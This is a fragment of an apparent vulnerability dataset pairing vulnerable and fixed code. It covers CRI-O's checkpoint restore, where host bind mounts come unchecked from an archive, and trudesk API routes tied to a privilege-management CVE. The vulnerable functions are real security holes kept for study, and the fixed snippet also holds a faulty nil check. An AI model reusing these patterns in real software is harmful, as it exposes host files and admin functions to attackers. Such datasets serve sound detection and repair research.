&types.Mount{\n\t\t\tContainerPath: m.Destination,\n\t\t\tHostPath: m.Source,\n\t\t}\n\n\t\tfor _, createMount := range createMounts {\n\t\t\tif createMount.ContainerPath == m.Destination {\n\t\t\t\tmount.HostPath = createMount.HostPath\n\t\t\t}\n\t\t}\n\n\t\tfor _, opt := range m.Options {\n\t\t\tswitch opt {\n\t\t\tcase \"ro\":\n\t\t\t\tmount.Readonly = true\n\t\t\tcase \"rro\":\n\t\t\t\tmount.RecursiveReadOnly = true\n\t\t\tcase \"rprivate\":\n\t\t\t\tmount.Propagation = types.MountPropagation_PROPAGATION_PRIVATE\n\t\t\tcase \"rshared\":\n\t\t\t\tmount.Propagation = types.MountPropagation_PROPAGATION_BIDIRECTIONAL\n\t\t\tcase \"rslaved\":\n\t\t\t\tmount.Propagation = types.MountPropagation_PROPAGATION_HOST_TO_CONTAINER\n\t\t\t}\n\t\t}\n\n\t\t// Recursive Read-only (RRO) support requires the mount to be\n\t\t// read-only and the mount propagation set to private.\n\t\tif mount.RecursiveReadOnly {\n\t\t\tmount.Readonly = true\n\t\t\tmount.Propagation = types.MountPropagation_PROPAGATION_PRIVATE\n\t\t}\n\n\t\tlog.Debugf(ctx, \"Adding mounts %#v\", mount)\n\t\tcontainerConfig.Mounts = append(containerConfig.Mounts, mount)\n\t}\n\tsandboxConfig := &types.PodSandboxConfig{\n\t\tMetadata: &types.PodSandboxMetadata{\n\t\t\tName: sb.Metadata().Name,\n\t\t\tUid: sb.Metadata().Uid,\n\t\t\tNamespace: sb.Metadata().Namespace,\n\t\t\tAttempt: sb.Metadata().Attempt,\n\t\t},\n\t\tLinux: 
&types.LinuxPodSandboxConfig{},\n\t}\n\n\tif err := ctr.SetConfig(containerConfig, sandboxConfig); err != nil {\n\t\treturn \"\", fmt.Errorf(\"setting container config: %w\", err)\n\t}\n\n\tif err := ctr.SetNameAndID(\"\"); err != nil {\n\t\treturn \"\", fmt.Errorf(\"setting container name and ID: %w\", err)\n\t}\n\n\tif _, err = s.ReserveContainerName(ctr.ID(), ctr.Name()); err != nil {\n\t\treturn \"\", fmt.Errorf(\"kubelet may be retrying requests that are timing out in CRI-O due to system load: %w\", err)\n\t}\n\n\tdefer func() {\n\t\tif retErr != nil {\n\t\t\tlog.Infof(ctx, \"RestoreCtr: releasing container name %s\", ctr.Name())\n\t\t\ts.ReleaseContainerName(ctx, ctr.Name())\n\t\t}\n\t}()\n\tctr.SetRestore(true)\n\n\tnewContainer, err := s.createSandboxContainer(ctx, ctr, sb)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tdefer func() {\n\t\tif retErr != nil {\n\t\t\tlog.Infof(ctx, \"RestoreCtr: deleting container %s from storage\", ctr.ID())\n\t\t\terr2 := s.StorageRuntimeServer().DeleteContainer(ctx, ctr.ID())\n\t\t\tif err2 != nil {\n\t\t\t\tlog.Warnf(ctx, \"Failed to cleanup container directory: %v\", err2)\n\t\t\t}\n\t\t}\n\t}()\n\n\ts.addContainer(ctx, newContainer)\n\n\tdefer func() {\n\t\tif retErr != nil {\n\t\t\tlog.Infof(ctx, \"RestoreCtr: removing container %s\", newContainer.ID())\n\t\t\ts.removeContainer(ctx, newContainer)\n\t\t}\n\t}()\n\n\tif err := s.CtrIDIndex().Add(ctr.ID()); err != nil {\n\t\treturn \"\", err\n\t}\n\tdefer func() {\n\t\tif retErr != nil {\n\t\t\tlog.Infof(ctx, \"RestoreCtr: deleting container ID %s from idIndex\", ctr.ID())\n\t\t\tif err := s.CtrIDIndex().Delete(ctr.ID()); err != nil {\n\t\t\t\tlog.Warnf(ctx, \"Couldn't delete ctr id %s from idIndex\", ctr.ID())\n\t\t\t}\n\t\t}\n\t}()\n\n\tnewContainer.SetCreated()\n\tnewContainer.SetRestore(true)\n\tnewContainer.SetRestoreArchivePath(restoreArchivePath)\n\tnewContainer.SetRestoreStorageImageID(restoreStorageImageID)\n\tnewContainer.SetCheckpointedAt(config.CheckpointedAt)\n\n\tif isContextError(ctx.Err()) {\n\t\tlog.Infof(ctx, \"RestoreCtr: context was either canceled or the deadline was exceeded: %v\", ctx.Err())\n\t\treturn \"\", ctx.Err()\n\t}\n\treturn ctr.ID(), nil\n}"}], "fix_func": [{"id": "fix_go_161_1", "commit": "e8e7dcb", "file_path": "server/container_restore.go", "start_line": 55, "end_line": 394, "snippet": "func (s *Server) CRImportCheckpoint(\n\tctx context.Context,\n\tcreateConfig *types.ContainerConfig,\n\tsb *sandbox.Sandbox, sandboxUID string,\n) (ctrID string, retErr error) {\n\tvar mountPoint string\n\n\t// Ensure that the image to restore the checkpoint from has been provided.\n\tif createConfig.Image == nil || createConfig.Image.Image == \"\" {\n\t\treturn \"\", errors.New(`attribute \"image\" missing from container definition`)\n\t}\n\n\tif createConfig.Metadata == nil && createConfig.Metadata.Name == \"\" {\n\t\treturn \"\", errors.New(`attribute \"metadata\" missing from container definition`)\n\t}\n\n\tinputImage := createConfig.Image.Image\n\tcreateMounts := createConfig.Mounts\n\tcreateAnnotations := createConfig.Annotations\n\tcreateLabels := createConfig.Labels\n\n\trestoreStorageImageID, err := s.checkIfCheckpointOCIImage(ctx, inputImage)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\n\tvar restoreArchivePath string\n\tif restoreStorageImageID != nil {\n\t\tsystemCtx, err := s.contextForNamespace(sb.Metadata().Namespace)\n\t\tif err != nil {\n\t\t\treturn \"\", fmt.Errorf(\"get context for namespace: %w\", err)\n\t\t}\n\t\t// WARNING: This hard-codes an 
assumption that SignaturePolicyPath set specifically for the namespace is never less restrictive\n\t\t// than the default system-wide policy, i.e. that if an image is successfully pulled, it always conforms to the system-wide policy.\n\t\tif systemCtx.SignaturePolicyPath != \"\" {\n\t\t\treturn \"\", fmt.Errorf(\"namespaced signature policy %s defined for pods in namespace %s; signature validation is not supported for container restore\", systemCtx.SignaturePolicyPath, sb.Metadata().Namespace)\n\t\t}\n\n\t\tlog.Debugf(ctx, \"Restoring from oci image %s\", inputImage)\n\n\t\t// This is not out-of-process, but it is at least out of the CRI-O codebase; containers/storage uses raw strings.\n\t\tmountPoint, err = s.ContainerServer.StorageImageServer().GetStore().MountImage(restoreStorageImageID.IDStringForOutOfProcessConsumptionOnly(), nil, \"\")\n\t\tif err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\n\t\tlog.Debugf(ctx, \"Checkpoint image %s mounted at %v\\n\", restoreStorageImageID, mountPoint)\n\n\t\tdefer func() {\n\t\t\t// This is not out-of-process, but it is at least out of the CRI-O codebase; containers/storage uses raw strings.\n\t\t\tif _, err := s.ContainerServer.StorageImageServer().GetStore().UnmountImage(restoreStorageImageID.IDStringForOutOfProcessConsumptionOnly(), true); err != nil {\n\t\t\t\tlog.Errorf(ctx, \"Could not unmount checkpoint image %s: %q\", restoreStorageImageID, err)\n\t\t\t}\n\t\t}()\n\t} else {\n\t\t// First get the container definition from the\n\t\t// tarball to a temporary directory\n\t\tarchiveFile, err := os.Open(inputImage)\n\t\tif err != nil {\n\t\t\treturn \"\", fmt.Errorf(\"failed to open checkpoint archive %s for import: %w\", inputImage, err)\n\t\t}\n\t\tdefer func(f *os.File) {\n\t\t\tif err := f.Close(); err != nil {\n\t\t\t\tlog.Errorf(ctx, \"Unable to close file %s: %q\", f.Name(), err)\n\t\t\t}\n\t\t}(archiveFile)\n\n\t\trestoreArchivePath = inputImage\n\t\toptions := &archive.TarOptions{\n\t\t\t// Here we only need the files config.dump and spec.dump\n\t\t\tExcludePatterns: []string{\n\t\t\t\t\"artifacts\",\n\t\t\t\t\"ctr.log\",\n\t\t\t\tmetadata.RootFsDiffTar,\n\t\t\t\tmetadata.NetworkStatusFile,\n\t\t\t\tmetadata.DeletedFilesFile,\n\t\t\t\tmetadata.CheckpointDirectory,\n\t\t\t},\n\t\t}\n\t\tmountPoint, err = os.MkdirTemp(\"\", \"checkpoint\")\n\t\tif err != nil {\n\t\t\treturn \"\", err\n\t\t}\n\t\tdefer func() {\n\t\t\tif err := os.RemoveAll(mountPoint); err != nil {\n\t\t\t\tlog.Errorf(ctx, \"Could not recursively remove %s: %q\", mountPoint, err)\n\t\t\t}\n\t\t}()\n\t\terr = archive.Untar(archiveFile, mountPoint, options)\n\t\tif err != nil {\n\t\t\treturn \"\", fmt.Errorf(\"unpacking of checkpoint archive %s failed: %w\", mountPoint, err)\n\t\t}\n\t\tlog.Debugf(ctx, \"Unpacked checkpoint in %s\", mountPoint)\n\t}\n\n\t// Load spec.dump from temporary directory\n\tdumpSpec := new(spec.Spec)\n\tif _, err := metadata.ReadJSONFile(dumpSpec, mountPoint, metadata.SpecDumpFile); err != nil {\n\t\treturn \"\", fmt.Errorf(\"failed to read %q: %w\", metadata.SpecDumpFile, err)\n\t}\n\n\t// Load config.dump from temporary directory\n\tconfig := new(metadata.ContainerConfig)\n\tif _, err := metadata.ReadJSONFile(config, mountPoint, metadata.ConfigDumpFile); err != nil {\n\t\treturn \"\", fmt.Errorf(\"failed to read %q: %w\", metadata.ConfigDumpFile, err)\n\t}\n\n\toriginalAnnotations := make(map[string]string)\n\n\tif err := json.Unmarshal([]byte(dumpSpec.Annotations[annotations.Annotations]), &originalAnnotations); err != nil {\n\t\treturn \"\", 
fmt.Errorf(\"failed to read %q: %w\", annotations.Annotations, err)\n\t}\n\n\tif sandboxUID != \"\" {\n\t\tif _, ok := originalAnnotations[kubetypes.KubernetesPodUIDLabel]; ok {\n\t\t\toriginalAnnotations[kubetypes.KubernetesPodUIDLabel] = sandboxUID\n\t\t}\n\t}\n\n\tif createAnnotations != nil {\n\t\t// The hash also needs to be update or Kubernetes thinks the container needs to be restarted\n\t\t_, ok1 := createAnnotations[\"io.kubernetes.container.hash\"]\n\t\t_, ok2 := originalAnnotations[\"io.kubernetes.container.hash\"]\n\n\t\tif ok1 && ok2 {\n\t\t\toriginalAnnotations[\"io.kubernetes.container.hash\"] = createAnnotations[\"io.kubernetes.container.hash\"]\n\t\t}\n\t}\n\n\tstopMutex := sb.StopMutex()\n\tstopMutex.RLock()\n\tdefer stopMutex.RUnlock()\n\tif sb.Stopped() {\n\t\treturn \"\", fmt.Errorf(\"CreateContainer failed as the sandbox was stopped: %s\", sb.ID())\n\t}\n\n\tctr, err := container.New()\n\tif err != nil {\n\t\treturn \"\", fmt.Errorf(\"failed to create container: %w\", err)\n\t}\n\n\t// Newer checkpoints archives have RootfsImageRef set\n\t// and using it for the restore is more correct.\n\t// For the Kubernetes use case the output of 'crictl ps'\n\t// contains for the original container under 'IMAGE' something\n\t// like 'registry/path/container@sha256:123444444...'.\n\t// The restored container was, however, only displaying something\n\t// like 'registry/path/container'.\n\t// This had two problems, first, the output from the restored\n\t// container was different, but the bigger problem was, that\n\t// CRI-O might pull the wrong image from the registry.\n\t// If the container in the registry was updated (new latest tag)\n\t// all of a sudden the wrong base image would be downloaded.\n\trootFSImage := config.RootfsImageName\n\tif config.RootfsImageRef != \"\" {\n\t\tid, err := storage.ParseStorageImageIDFromOutOfProcessData(config.RootfsImageRef)\n\t\tif err != nil {\n\t\t\treturn \"\", fmt.Errorf(\"invalid RootfsImageRef %q: %w\", config.RootfsImageRef, err)\n\t\t}\n\t\t// This is not quite out-of-process consumption, but types.ContainerConfig is at least\n\t\t// a cross-process API, and this value is correct in that API.\n\t\trootFSImage = id.IDStringForOutOfProcessConsumptionOnly()\n\t}\n\tcontainerConfig := &types.ContainerConfig{\n\t\tMetadata: &types.ContainerMetadata{\n\t\t\tName: createConfig.Metadata.Name,\n\t\t\tAttempt: createConfig.Metadata.Attempt,\n\t\t},\n\t\tImage: &types.ImageSpec{\n\t\t\tImage: rootFSImage,\n\t\t},\n\t\tLinux: &types.LinuxContainerConfig{\n\t\t\tResources: &types.LinuxContainerResources{},\n\t\t\tSecurityContext: &types.LinuxContainerSecurityContext{},\n\t\t},\n\t\tAnnotations: originalAnnotations,\n\t\t// The labels are nod changed or adapted. 
They are just taken from the CRI\n\t\t// request without any modification (in contrast to the annotations).\n\t\tLabels: createLabels,\n\t}\n\n\tif createConfig.Linux != nil {\n\t\tif createConfig.Linux.Resources != nil {\n\t\t\tcontainerConfig.Linux.Resources = createConfig.Linux.Resources\n\t\t}\n\n\t\tif createConfig.Linux.SecurityContext != nil {\n\t\t\tcontainerConfig.Linux.SecurityContext = createConfig.Linux.SecurityContext\n\t\t}\n\t}\n\n\tif dumpSpec.Linux != nil {\n\t\tif dumpSpec.Linux.MaskedPaths != nil {\n\t\t\tcontainerConfig.Linux.SecurityContext.MaskedPaths = dumpSpec.Linux.MaskedPaths\n\t\t}\n\n\t\tif dumpSpec.Linux.ReadonlyPaths != nil {\n\t\t\tcontainerConfig.Linux.SecurityContext.ReadonlyPaths = dumpSpec.Linux.ReadonlyPaths\n\t\t}\n\t}\n\n\tignoreMounts := map[string]bool{\n\t\t\"/proc\": true,\n\t\t\"/dev\": true,\n\t\t\"/dev/pts\": true,\n\t\t\"/dev/mqueue\": true,\n\t\t\"/sys\": true,\n\t\t\"/sys/fs/cgroup\": true,\n\t\t\"/dev/shm\": true,\n\t\t\"/etc/resolv.conf\": true,\n\t\t\"/etc/hostname\": true,\n\t\t\"/run/secrets\": true,\n\t\t\"/run/.containerenv\": true,\n\t}\n\n\t// It is necessary to ensure that all bind mounts in the checkpoint archive are defined\n\t// in the create container requested coming in via the CRI. If this check would not\n\t// be here it would be possible to create a checkpoint archive that mounts some random\n\t// file/directory on the host without the user knowing as it will happen without specifying\n\t// it in the container definition.\n\tmissingMount := []string{}\n\n\tfor _, m := range dumpSpec.Mounts {\n\t\t// Following mounts are ignored as they might point to the\n\t\t// wrong location and if ignored the mounts will correctly\n\t\t// be setup to point to the new location.\n\t\tif ignoreMounts[m.Destination] {\n\t\t\tcontinue\n\t\t}\n\t\tmount := &types.Mount{\n\t\t\tContainerPath: m.Destination,\n\t\t}\n\n\t\tbindMountFound := false\n\t\tfor _, createMount := range createMounts {\n\t\t\tif createMount.ContainerPath == m.Destination {\n\t\t\t\tmount.HostPath = createMount.HostPath\n\t\t\t\tmount.Readonly = createMount.Readonly\n\t\t\t\tmount.RecursiveReadOnly = createMount.RecursiveReadOnly\n\t\t\t\tmount.Propagation = createMount.Propagation\n\t\t\t\tmount.RecursiveReadOnly = createMount.RecursiveReadOnly\n\t\t\t\tbindMountFound = true\n\t\t\t}\n\t\t}\n\t\tif !bindMountFound {\n\t\t\tmissingMount = append(missingMount, m.Destination)\n\t\t\t// If one mount is missing we can skip over any further code as we have\n\t\t\t// to abort the restore process anyway. 
Not using break to get all missing\n\t\t\t// mountpoints in one error message.\n\t\t\tcontinue\n\t\t}\n\n\t\tlog.Debugf(ctx, \"Adding mounts %#v\", mount)\n\t\tcontainerConfig.Mounts = append(containerConfig.Mounts, mount)\n\t}\n\tif len(missingMount) > 0 {\n\t\treturn \"\", fmt.Errorf(\n\t\t\t\"restoring %q expects following bind mounts defined (%s)\",\n\t\t\tinputImage,\n\t\t\tstrings.Join(missingMount, \",\"),\n\t\t)\n\t}\n\n\tsandboxConfig := &types.PodSandboxConfig{\n\t\tMetadata: &types.PodSandboxMetadata{\n\t\t\tName: sb.Metadata().Name,\n\t\t\tUid: sb.Metadata().Uid,\n\t\t\tNamespace: sb.Metadata().Namespace,\n\t\t\tAttempt: sb.Metadata().Attempt,\n\t\t},\n\t\tLinux: &types.LinuxPodSandboxConfig{},\n\t}\n\n\tif err := ctr.SetConfig(containerConfig, sandboxConfig); err != nil {\n\t\treturn \"\", fmt.Errorf(\"setting container config: %w\", err)\n\t}\n\n\tif err := ctr.SetNameAndID(\"\"); err != nil {\n\t\treturn \"\", fmt.Errorf(\"setting container name and ID: %w\", err)\n\t}\n\n\tif _, err = s.ReserveContainerName(ctr.ID(), ctr.Name()); err != nil {\n\t\treturn \"\", fmt.Errorf(\"kubelet may be retrying requests that are timing out in CRI-O due to system load: %w\", err)\n\t}\n\n\tdefer func() {\n\t\tif retErr != nil {\n\t\t\tlog.Infof(ctx, \"RestoreCtr: releasing container name %s\", ctr.Name())\n\t\t\ts.ReleaseContainerName(ctx, ctr.Name())\n\t\t}\n\t}()\n\tctr.SetRestore(true)\n\n\tnewContainer, err := s.createSandboxContainer(ctx, ctr, sb)\n\tif err != nil {\n\t\treturn \"\", err\n\t}\n\tdefer func() {\n\t\tif retErr != nil {\n\t\t\tlog.Infof(ctx, \"RestoreCtr: deleting container %s from storage\", ctr.ID())\n\t\t\terr2 := s.StorageRuntimeServer().DeleteContainer(ctx, ctr.ID())\n\t\t\tif err2 != nil {\n\t\t\t\tlog.Warnf(ctx, \"Failed to cleanup container directory: %v\", err2)\n\t\t\t}\n\t\t}\n\t}()\n\n\ts.addContainer(ctx, newContainer)\n\n\tdefer func() {\n\t\tif retErr != nil {\n\t\t\tlog.Infof(ctx, \"RestoreCtr: removing container %s\", newContainer.ID())\n\t\t\ts.removeContainer(ctx, newContainer)\n\t\t}\n\t}()\n\n\tif err := s.CtrIDIndex().Add(ctr.ID()); err != nil {\n\t\treturn \"\", err\n\t}\n\tdefer func() {\n\t\tif retErr != nil {\n\t\t\tlog.Infof(ctx, \"RestoreCtr: deleting container ID %s from idIndex\", ctr.ID())\n\t\t\tif err := s.CtrIDIndex().Delete(ctr.ID()); err != nil {\n\t\t\t\tlog.Warnf(ctx, \"Couldn't delete ctr id %s from idIndex\", ctr.ID())\n\t\t\t}\n\t\t}\n\t}()\n\n\tnewContainer.SetCreated()\n\tnewContainer.SetRestore(true)\n\tnewContainer.SetRestoreArchivePath(restoreArchivePath)\n\tnewContainer.SetRestoreStorageImageID(restoreStorageImageID)\n\tnewContainer.SetCheckpointedAt(config.CheckpointedAt)\n\n\tif isContextError(ctx.Err()) {\n\t\tlog.Infof(ctx, \"RestoreCtr: context was either canceled or the deadline was exceeded: %v\", ctx.Err())\n\t\treturn \"\", ctx.Err()\n\t}\n\treturn ctr.ID(), nil\n}"}], "vul_patch": "--- a/server/container_restore.go\n+++ b/server/container_restore.go\n@@ -8,6 +8,10 @@\n \t// Ensure that the image to restore the checkpoint from has been provided.\n \tif createConfig.Image == nil || createConfig.Image.Image == \"\" {\n \t\treturn \"\", errors.New(`attribute \"image\" missing from container definition`)\n+\t}\n+\n+\tif createConfig.Metadata == nil && createConfig.Metadata.Name == \"\" {\n+\t\treturn \"\", errors.New(`attribute \"metadata\" missing from container definition`)\n \t}\n \n \tinputImage := createConfig.Image.Image\n@@ -101,69 +105,25 @@\n \t\treturn \"\", fmt.Errorf(\"failed to read %q: %w\", 
metadata.ConfigDumpFile, err)\n \t}\n \n-\tctrMetadata := types.ContainerMetadata{}\n \toriginalAnnotations := make(map[string]string)\n-\toriginalLabels := make(map[string]string)\n-\n-\tif dumpSpec.Annotations[annotations.ContainerManager] == \"libpod\" {\n-\t\t// This is an import from Podman\n-\t\tctrMetadata.Name = config.Name\n-\t\tctrMetadata.Attempt = 0\n-\t} else {\n-\t\tif err := json.Unmarshal([]byte(dumpSpec.Annotations[annotations.Metadata]), &ctrMetadata); err != nil {\n-\t\t\treturn \"\", fmt.Errorf(\"failed to read %q: %w\", annotations.Metadata, err)\n-\t\t}\n-\t\tif createConfig.Metadata != nil && createConfig.Metadata.Name != \"\" {\n-\t\t\tctrMetadata.Name = createConfig.Metadata.Name\n-\t\t}\n-\t\tif err := json.Unmarshal([]byte(dumpSpec.Annotations[annotations.Annotations]), &originalAnnotations); err != nil {\n-\t\t\treturn \"\", fmt.Errorf(\"failed to read %q: %w\", annotations.Annotations, err)\n-\t\t}\n-\n-\t\tif err := json.Unmarshal([]byte(dumpSpec.Annotations[annotations.Labels]), &originalLabels); err != nil {\n-\t\t\treturn \"\", fmt.Errorf(\"failed to read %q: %w\", annotations.Labels, err)\n-\t\t}\n-\t\tif sandboxUID != \"\" {\n-\t\t\tif _, ok := originalLabels[kubetypes.KubernetesPodUIDLabel]; ok {\n-\t\t\t\toriginalLabels[kubetypes.KubernetesPodUIDLabel] = sandboxUID\n-\t\t\t}\n-\t\t\tif _, ok := originalAnnotations[kubetypes.KubernetesPodUIDLabel]; ok {\n-\t\t\t\toriginalAnnotations[kubetypes.KubernetesPodUIDLabel] = sandboxUID\n-\t\t\t}\n-\t\t}\n-\n-\t\tif createLabels != nil {\n-\t\t\tfixupLabels := []string{\n-\t\t\t\t// Update the container name. It has already been updated in metadata.Name.\n-\t\t\t\t// It also needs to be updated in the container labels.\n-\t\t\t\tkubetypes.KubernetesContainerNameLabel,\n-\t\t\t\t// Update pod name in the labels.\n-\t\t\t\tkubetypes.KubernetesPodNameLabel,\n-\t\t\t\t// Also update namespace.\n-\t\t\t\tkubetypes.KubernetesPodNamespaceLabel,\n-\t\t\t}\n-\n-\t\t\tfor _, annotation := range fixupLabels {\n-\t\t\t\t_, ok1 := createLabels[annotation]\n-\t\t\t\t_, ok2 := originalLabels[annotation]\n-\n-\t\t\t\t// If the value is not set in the original container or\n-\t\t\t\t// if it is not set in the new container, just skip\n-\t\t\t\t// the step of updating metadata.\n-\t\t\t\tif ok1 && ok2 {\n-\t\t\t\t\toriginalLabels[annotation] = createLabels[annotation]\n-\t\t\t\t}\n-\t\t\t}\n-\t\t}\n-\n-\t\tif createAnnotations != nil {\n-\t\t\t// The hash also needs to be updated or Kubernetes thinks the container needs to be restarted\n-\t\t\t_, ok1 := createAnnotations[\"io.kubernetes.container.hash\"]\n-\t\t\t_, ok2 := originalAnnotations[\"io.kubernetes.container.hash\"]\n-\n-\t\t\tif ok1 && ok2 {\n-\t\t\t\toriginalAnnotations[\"io.kubernetes.container.hash\"] = createAnnotations[\"io.kubernetes.container.hash\"]\n-\t\t\t}\n+\n+\tif err := json.Unmarshal([]byte(dumpSpec.Annotations[annotations.Annotations]), &originalAnnotations); err != nil {\n+\t\treturn \"\", fmt.Errorf(\"failed to read %q: %w\", annotations.Annotations, err)\n+\t}\n+\n+\tif sandboxUID != \"\" {\n+\t\tif _, ok := originalAnnotations[kubetypes.KubernetesPodUIDLabel]; ok {\n+\t\t\toriginalAnnotations[kubetypes.KubernetesPodUIDLabel] = sandboxUID\n+\t\t}\n+\t}\n+\n+\tif createAnnotations != nil {\n+\t\t// The hash also needs to be updated or Kubernetes thinks the container needs to be restarted\n+\t\t_, ok1 := createAnnotations[\"io.kubernetes.container.hash\"]\n+\t\t_, ok2 := originalAnnotations[\"io.kubernetes.container.hash\"]\n+\n+\t\tif ok1 && ok2 
{\n+\t\t\toriginalAnnotations[\"io.kubernetes.container.hash\"] = createAnnotations[\"io.kubernetes.container.hash\"]\n \t\t}\n \t}\n \n@@ -203,8 +163,8 @@\n \t}\n \tcontainerConfig := &types.ContainerConfig{\n \t\tMetadata: &types.ContainerMetadata{\n-\t\t\tName:    ctrMetadata.Name,\n-\t\t\tAttempt: ctrMetadata.Attempt,\n+\t\t\tName:    createConfig.Metadata.Name,\n+\t\t\tAttempt: createConfig.Metadata.Attempt,\n \t\t},\n \t\tImage: &types.ImageSpec{\n \t\t\tImage: rootFSImage,\n@@ -214,7 +174,9 @@\n \t\t\tSecurityContext: &types.LinuxContainerSecurityContext{},\n \t\t},\n \t\tAnnotations: originalAnnotations,\n-\t\tLabels: originalLabels,\n+\t\t// The labels are not changed or adapted. They are just taken from the CRI\n+\t\t// request without any modification (in contrast to the annotations).\n+\t\tLabels: createLabels,\n \t}\n \n \tif createConfig.Linux != nil {\n@@ -251,6 +213,13 @@\n \t\t\"/run/.containerenv\": true,\n \t}\n \n+\t// It is necessary to ensure that all bind mounts in the checkpoint archive are defined\n+\t// in the container create request coming in via the CRI. If this check were not\n+\t// here it would be possible to create a checkpoint archive that mounts some random\n+\t// file/directory on the host without the user knowing, as it will happen without specifying\n+\t// it in the container definition.\n+\tmissingMount := []string{}\n+\n \tfor _, m := range dumpSpec.Mounts {\n \t\t// Following mounts are ignored as they might point to the\n \t\t// wrong location and if ignored the mounts will correctly\n@@ -260,40 +229,38 @@\n \t\t}\n \t\tmount := &types.Mount{\n \t\t\tContainerPath: m.Destination,\n-\t\t\tHostPath:      m.Source,\n-\t\t}\n-\n+\t\t}\n+\n+\t\tbindMountFound := false\n \t\tfor _, createMount := range createMounts {\n \t\t\tif createMount.ContainerPath == m.Destination {\n \t\t\t\tmount.HostPath = createMount.HostPath\n-\t\t\t}\n-\t\t}\n-\n-\t\tfor _, opt := range m.Options {\n-\t\t\tswitch opt {\n-\t\t\tcase \"ro\":\n-\t\t\t\tmount.Readonly = true\n-\t\t\tcase \"rro\":\n-\t\t\t\tmount.RecursiveReadOnly = true\n-\t\t\tcase \"rprivate\":\n-\t\t\t\tmount.Propagation = types.MountPropagation_PROPAGATION_PRIVATE\n-\t\t\tcase \"rshared\":\n-\t\t\t\tmount.Propagation = types.MountPropagation_PROPAGATION_BIDIRECTIONAL\n-\t\t\tcase \"rslaved\":\n-\t\t\t\tmount.Propagation = types.MountPropagation_PROPAGATION_HOST_TO_CONTAINER\n-\t\t\t}\n-\t\t}\n-\n-\t\t// Recursive Read-only (RRO) support requires the mount to be\n-\t\t// read-only and the mount propagation set to private.\n-\t\tif mount.RecursiveReadOnly {\n-\t\t\tmount.Readonly = true\n-\t\t\tmount.Propagation = types.MountPropagation_PROPAGATION_PRIVATE\n+\t\t\t\tmount.Readonly = createMount.Readonly\n+\t\t\t\tmount.RecursiveReadOnly = createMount.RecursiveReadOnly\n+\t\t\t\tmount.Propagation = createMount.Propagation\n+\t\t\t\tmount.RecursiveReadOnly = createMount.RecursiveReadOnly\n+\t\t\t\tbindMountFound = true\n+\t\t\t}\n+\t\t}\n+\t\tif !bindMountFound {\n+\t\t\tmissingMount = append(missingMount, m.Destination)\n+\t\t\t// If one mount is missing we can skip over any further code as we have\n+\t\t\t// to abort the restore process anyway. 
Not using break to get all missing\n+\t\t\t// mountpoints in one error message.\n+\t\t\tcontinue\n \t\t}\n \n \t\tlog.Debugf(ctx, \"Adding mounts %#v\", mount)\n \t\tcontainerConfig.Mounts = append(containerConfig.Mounts, mount)\n \t}\n+\tif len(missingMount) > 0 {\n+\t\treturn \"\", fmt.Errorf(\n+\t\t\t\"restoring %q expects following bind mounts defined (%s)\",\n+\t\t\tinputImage,\n+\t\t\tstrings.Join(missingMount, \",\"),\n+\t\t)\n+\t}\n+\n \tsandboxConfig := &types.PodSandboxConfig{\n \t\tMetadata: &types.PodSandboxMetadata{\n \t\t\tName: sb.Metadata().Name,\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2022-1770", "cve_description": "Improper Privilege Management in GitHub repository polonel/trudesk prior to 1.2.2.", "cwe_info": {"CWE-269": {"name": "Improper Privilege Management", "description": "The product does not properly assign, modify, track, or check privileges for an actor, creating an unintended sphere of control for that actor."}}, "repo": "https://github.com/polonel/trudesk", "patch_url": ["https://github.com/polonel/trudesk/commit/889876f66c9a5b28f019258e329310c31d72cbd2"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_183_1", "commit": "c78ae09", "file_path": "src/controllers/api/v2/routes.js", "start_line": 15, "end_line": 74, "snippet": "module.exports = function (middleware, router, controllers) {\n // Shorten Vars\n const apiv2Auth = middleware.apiv2\n const apiv2 = controllers.api.v2\n const isAdmin = middleware.isAdmin\n const isAgent = middleware.isAgent\n const isAgentOrAdmin = middleware.isAgentOrAdmin\n const canUser = middleware.canUser\n\n // Common\n router.post('/api/v2/login', controllers.api.v2.common.login)\n router.post('/api/v2/token', controllers.api.v2.common.token)\n\n // Accounts\n router.get('/api/v2/accounts', apiv2Auth, apiv2.accounts.get)\n router.post('/api/v2/accounts', apiv2Auth, apiv2.accounts.create)\n router.put('/api/v2/accounts/:username', apiv2Auth, apiv2.accounts.update)\n\n // Tickets\n router.get('/api/v2/tickets', apiv2Auth, apiv2.tickets.get)\n router.post('/api/v2/tickets', apiv2Auth, apiv2.tickets.create)\n router.post('/api/v2/tickets/transfer/:uid', apiv2Auth, isAdmin, apiv2.tickets.transferToThirdParty)\n router.get('/api/v2/tickets/:uid', apiv2Auth, apiv2.tickets.single)\n router.put('/api/v2/tickets/batch', apiv2Auth, apiv2.tickets.batchUpdate)\n router.put('/api/v2/tickets/:uid', apiv2Auth, apiv2.tickets.update)\n router.delete('/api/v2/tickets/:uid', apiv2Auth, apiv2.tickets.delete)\n router.delete('/api/v2/tickets/deleted/:id', apiv2Auth, isAdmin, apiv2.tickets.permDelete)\n\n // Groups\n router.get('/api/v2/groups', apiv2Auth, apiv2.groups.get)\n router.post('/api/v2/groups', apiv2Auth, apiv2.groups.create)\n router.put('/api/v2/groups/:id', apiv2Auth, apiv2.groups.update)\n router.delete('/api/v2/groups/:id', apiv2Auth, apiv2.groups.delete)\n\n // Teams\n router.get('/api/v2/teams', apiv2Auth, apiv2.teams.get)\n router.post('/api/v2/teams', apiv2Auth, apiv2.teams.create)\n router.put('/api/v2/teams/:id', apiv2Auth, apiv2.teams.update)\n router.delete('/api/v2/teams/:id', apiv2Auth, apiv2.teams.delete)\n\n // Departments\n router.get('/api/v2/departments', apiv2Auth, apiv2.departments.get)\n router.post('/api/v2/departments', apiv2Auth, apiv2.departments.create)\n router.put('/api/v2/departments/:id', apiv2Auth, apiv2.departments.update)\n router.delete('/api/v2/departments/:id', apiv2Auth, apiv2.departments.delete)\n\n // Notices\n router.get('/api/v2/notices', apiv2Auth, 
